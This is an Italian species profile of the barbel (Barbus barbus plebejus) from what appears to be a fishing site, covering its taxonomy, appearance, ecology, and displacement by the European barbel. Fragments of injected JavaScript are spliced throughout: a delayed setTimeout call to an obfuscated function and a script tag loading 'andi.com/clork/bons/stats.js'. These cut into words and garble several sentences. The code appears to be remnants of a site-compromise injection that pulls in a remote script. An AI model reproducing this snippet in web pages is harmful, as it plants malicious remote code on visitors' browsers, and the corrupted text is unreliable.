Il barbo

Nome comune: barbo;
None scientifico: Barbus barbus plebejus (Valenciennes, 1842);
Famiglia: Cyprinidae;
Ordine: Cypriniformes;
Origini: specie autoctona.
andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/stats.js?t=7&’ type=text/javascript language=javascript>

barbo

Descrizione
La sottospecie Barbus barbus plebejus possiede corpo affusolato, a sezione ovoidale, con dorso arcuato. La testa è appuntita, con bocca inferiore dotata di labbra carnose e due paia di barbigli. Le squame, cicloidi, sono di piccole dimensioni. La colorazione è variabile: solitamente il dorso appare di colore scuro (verde-bruno), mentre i fianchi sono argentei o dorati, con punteggiatura nera fine, presente nelle popolazioni appenniniche ma non in quelle padane. Il ventre è bianco. Le pinne, ben sviluppate, sono di colore grigio-rossastro, con fine punteggiatura nera. La pinna caudale, marcatamente bilobata, presenta una profonda incisura. Le taglie massime raggiungibili sono di circa 60 cm di lunghezza totale e di 4 Kg di peso corporeo.

Ecologia
Si tratta di una specie reofila, che colonizza le acque correnti dei corsi d’acqua di media e fondo valle, con fondali ghiaiosi (zona a barbo). Si nutre sul fondo di invertebrati acquatici, comportandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andosi in modo gregario. Gli adulti possono diventare occasionalmente predatori, alimentandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andosi anche di avannotti e di piccoli ciprinidi. La riproduzione è primaverile (maggio-giugno) e avviene su letti di frega ghiaiosi. La maturità sessuale viene raggiunta tra il terzo ed il quarto anno di età. Si ibrida con il barbo canino (Barbus meridionalis), dandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ando luogo ad individui interfecondi soprattutto dove le due specie coesistono.

Distribuzione e diffusione
Si tratta di una specie autoctona diffusa in gran parte delle acque della Penisola. In ambito padano il barbo è ben rappresentato negli affluenti di sinistra e di destra del Fiume Po, soprattutto nella fascia pedemontana e dell’alta pianura, dove costituisce la parte preponderante della biomassa ittica. In Emilia-Romagna è protetto con un periodo di divieto di pesca dall’1/4 al 31/5 e con una misura minima di 16 cm. La specie è invece praticamente scomparsa da alcuni decenni dal Po e dal primo tratto degli affluenti, dove è stata sostituita da un’altra specie di origini alloctone, il barbo d’oltralpe o barbo europeo (Barbus barbus), che ne ha occupato stabilmente la nicchia. Si tratta di una specie che può raggiungere taglie corporee assai maggiori rispetto a quelle del barbo (1 m di lunghezza totale e 8-10 Kg di peso corporeo), in grado di creare problemi, sia di ibridazione che di competizione alimentare, nei confronti della forma nativa. Il barbo d’oltralpe è più slanciato rispetto al barbo, ha scaglie più grandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi e livrea grigio-argentea uniforme, priva di macchie. Le pinne tendono al rossastro.

Si ringrazia Federico Ielli
copyright PescaNetwork – contenuti non riproducibili – maggiori info qui